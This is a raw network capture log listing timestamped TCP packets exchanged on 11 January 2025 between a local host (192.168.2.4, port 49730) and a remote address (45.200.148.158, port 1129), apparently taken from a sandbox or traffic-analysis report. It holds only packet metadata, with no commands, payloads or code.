Jan 11, 2025 20:26:06.656318903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656332970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656346083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656372070 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.656395912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.656464100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656477928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656491995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656506062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656514883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.656518936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656533003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656536102 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.656546116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656560898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656568050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.656574965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656589031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656601906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.656609058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.656636953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.657320023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.657365084 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.686901093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.686916113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.686930895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.686964989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.687016010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.687030077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.687043905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.687051058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.687060118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.687077999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.687200069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.688229084 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.741019964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741055965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741087914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741121054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741122961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.741153002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741205931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.741297960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741329908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741358042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.741362095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741394043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741415024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.741426945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741686106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741731882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.741741896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741775036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741780996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.741806030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741911888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741950989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.741961002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.741992950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742001057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.742023945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742055893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742089033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742093086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.742134094 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.742379904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742427111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742460012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742475033 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.742491961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742523909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742538929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.742554903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742588043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742621899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742626905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.742657900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.742906094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742943048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.742986917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.742991924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743024111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743056059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743068933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743088007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743119001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743129969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743151903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743195057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743474007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743505955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743537903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743576050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743635893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743676901 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743685007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743716955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743747950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743778944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743788004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743809938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743814945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743855000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743887901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743918896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743925095 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743951082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.743957996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.743983030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744015932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744056940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.744637966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744669914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744693041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.744703054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744734049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744745970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.744766951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744797945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744808912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.744829893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744860888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744893074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744903088 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.744925022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744932890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.744959116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.744990110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745008945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.745022058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745063066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.745393991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745426893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745466948 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.745476961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745508909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745541096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745552063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.745573044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745615959 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.745678902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745711088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745743036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745755911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.745774031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745805979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.745819092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746098042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746129990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746160984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746171951 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746192932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746201992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746225119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746331930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746346951 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746364117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746396065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746407986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746426105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746457100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746469021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746489048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746522903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746531010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746826887 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746857882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746872902 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746890068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746921062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746933937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.746953011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.746994972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.747004032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747035980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747066975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747077942 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.747098923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747129917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747142076 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.747162104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747193098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747206926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.747226954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747270107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.747653008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747684002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747715950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747726917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.747747898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747781038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747792006 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.747812986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747848034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747855902 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.747875929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.747917891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.777543068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.777602911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.777616978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.777677059 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.777721882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.777771950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.777859926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.777873993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.777889013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.777920961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.822468042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.835266113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835320950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835335016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835364103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.835414886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835429907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835450888 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.835549116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835562944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835577011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835583925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.835609913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.835738897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835752010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835766077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835779905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835787058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.835820913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.835946083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835961103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.835994959 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.836091995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836106062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836121082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836134911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836149931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836155891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.836179972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.836509943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836524963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836539030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836551905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836555004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.836565971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836575031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.836580038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836594105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836607933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836647034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.836647034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.836903095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836916924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836931944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.836951017 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.836966991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.837045908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837333918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837347984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837363958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837377071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837383032 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.837392092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837394953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.837405920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837419033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837433100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837440014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.837445974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837454081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.837459087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837477922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.837481976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837495089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837508917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.837527990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.837539911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838114977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838129044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838141918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838155031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838169098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838171005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838181973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838195086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838196039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838212013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838217974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838248968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838680029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838695049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838707924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838721991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838736057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838742018 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838748932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838762045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838762999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838778019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838790894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838792086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838804960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838818073 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838819027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838833094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838845968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.838846922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.838867903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.839641094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839654922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839668989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839677095 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.839683056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839696884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839699030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.839716911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839730978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839745045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839752913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.839756966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839771032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839771986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.839785099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839798927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839802980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.839812040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839824915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.839826107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.839848042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.840564013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.840578079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.840591908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.840605974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.840615034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.840631962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.840631962 CET	49730	1129	192.168.2.4	45.200.148.158
